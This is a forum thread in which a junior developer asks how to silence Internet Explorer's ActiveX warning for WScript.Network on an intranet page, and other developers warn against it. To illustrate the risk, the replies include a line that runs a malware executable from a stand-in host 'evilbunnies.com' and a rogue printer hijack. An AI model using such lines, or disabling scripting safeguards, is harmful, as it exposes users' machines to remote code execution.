var WshNetwork = new ActiveXObject("WScript.Network");
var Drives = WshNetwork.EnumNetworkDrives();

Which gives me this warning:
"An ActiveX control on this page might be unsafe to interact with other parts of the page. Do you want to allow this interaction?  YES  NO"

Does anyone know how I can make it so that I can ask the user to install or do something so that that message doesn't pop up again?

3 minutes ago, pavone wrote

 I have the following javascript:

1 2	var WshNetwork = new ActiveXObject("WScript.Network"); var Drives = WshNetwork.EnumNetworkDrives();

Which gives me this warning:
"An ActiveX control on this page might be unsafe to interact with other parts of the page. Do you want to allow this interaction?  YES  NO"

Does anyone know how I can make it so that I can ask the user to install or do something so that that message doesn't pop up again?

Oh boy. You want to do that in javascript? Please don't. By turning that warning off you would allow any web site to start running commands against your network. Not, I think, something you want to do.

I'm a tad afraid to ask why you'd ever want to do that in the first place?

Preferably I'd like that message turned off for my site only, an intranet site which only allows access to a few selected people. But any method to turn that message off would work, I'll leave it to the users whether they want to or not. 

What I'm doing is, reading users' mapped drives to the actual UNC paths so I can copy files from whatever mapped path they select. 

For a very limited usage scenario, and given that your end user's are clearly using IE, why not just create a custom ActiveX control marked as safe-for-scripting that performs the correct drive enumeration for you? Given it'll be internal only, it's very unlikely some random website would prod at and even if they did, it'd only offer very constrained functionality rather than that provided by a generic scripting control.

4 hours ago, pavone wrote

Does anyone know how I can make it so that I can ask the user to install or do something so that that message doesn't pop up again?

Add this site to the trusted zone. not automatically, but you can ask the user to do it.

At least then your users would be choosing to hand their machine to the website on a site-by-site basis.

If you have any kind of security policy at your work, you will certainly be breaching it by marking things like WScript.Network as "Safe for Scripting".

16 hours ago, pavone wrote

 No other way to do what I need I'm afraid. Not the method I'd prefer of doing it either, but I'm just the junior code monkey following instructions. 

Preferably I'd like that message turned off for my site only, an intranet site which only allows access to a few selected people. But any method to turn that message off would work, I'll leave it to the users whether they want to or not. 

What I'm doing is, reading users' mapped drives to the actual UNC paths so I can copy files from whatever mapped path they select. 

then please please talk to the boss about this .... point out that multiple developers are all saying this is really not a good idea, some of us have been developing for a *LONG TIME* like over 20 years and we know what we are saying. also one of the folks here who is saying this works for microsoft and knows a thing or two about web servers ....

I know that in some places there is a trend to "do it all in a web page" as that removes the need to deploy software on desktops and they think that is the way to go... sometimes that is true but not all the time.

one of the reasons that some folks used to bash Microsoft was they used to just let you run anything you wanted with very little to stop the user from totally f**** ing them selves.

this is not a good idea,  if you start allowing script on a web page to have local machine access rights then you become wide open to all kinds of evil attacks .....

if you let it enumerate drives what else can it do ? you might also then be allowing a command to format a drive or delete files or copy stuff w/o asking the user for permsssion.

please re-think this.

a moment ago, figuerres wrote

also one of the folks here who is saying this works for microsoft and knows a thing or two about web servers ....

And has written a book on web security.

And yes, once you all wscript you allow deletion of files, copying of files, generally messing around with the file system, network drives, all sorts of other fun things.

objNet.AddWindowsPrinterConnection("\\evilbunnies\printer");
objNet.SetDefaultPrinter("\\evilbunnies\printer");
alert("Shouldn't you get back to work, printing out your private emails and documents?");

Blowdart said:

And yes, once you all wscript you allow deletion of files, copying of files, generally messing around with the file system, network drives, all sorts of other fun things.

WScript is even worse than WScript.Network:

WScript.Exec("\\evilbunnies.com\installmalware.exe", 0);

Sad times for your business if you allow it from the Internet zone

Pavone said:

but I'm just the junior code monkey following instructions. 

You're the junior code money who will be fired when your company gets owned up by your foolish actions.

Don't play the game of "it'll never happen to me" or "security is just some theoretical risk". People can and do own-up small companies, and when it happens to yours, your fingerprints will be on the trigger when the CEO comes looking for a scapegoat.

Play it safe. Make sure you play no part in a decision that could very well lead to your company losing all of it's trade secrets and customer details. You really don't want to be the guy that let that happen.

C

If not, then how effective would it be to let this site into their Trusted Sites, and such only this website could make use of this ActiveX object? I noticed that this website already works in our network with the only caveat of producing a pop-up asking for confirmation, so it's not like I need to make any changes to the systems as I initially thought. Recall that this is an intranet site, no one will change internet zones. 

Regards 

-- Update ---

Looks like browse with UNC path will do fine.

Thanks for the feedback.

1 hour ago, Charles wrote

Why does this LOB app have to be web page?

C

well i am guessing here based on what the OP has posted so far:  they like using web pages at that company.

I have seen this kind of thinking many times before Charles.   for example i worked at one point on an app for a fairly large business and the app had to get data from 2 different web sites  by driving websites around ( lot's of crazy code doing web posts / gets and forms) to then get them to send back comma delimited data replies that i then had to clean up and import the data into a database.

the suppliers did not have a simple way to pull a data feed any other way, they included FedEx.  the data was not the normal shipping data, this had to do with cargo ships bills of lading originating in china coming to ports on the US east coast.

when i was brought in the app did not automate importing the data, humans had to follow a 25 to 30 step manual process. errors in that process did not show up for weeks.... i made it a 5 step process that reduced the errors and the time it took them.

it took 2 months to get them to ok using .net on 3 computers to run the app.

as a consultant i had to play nice and get the staff happy with the idea, in the end they loved what i was doing and all that but then the business was sold and we all moved on to other stuff.

this was a business that had probably 10,000 desktop pc's running Windows 2000 Pro in 2005-2006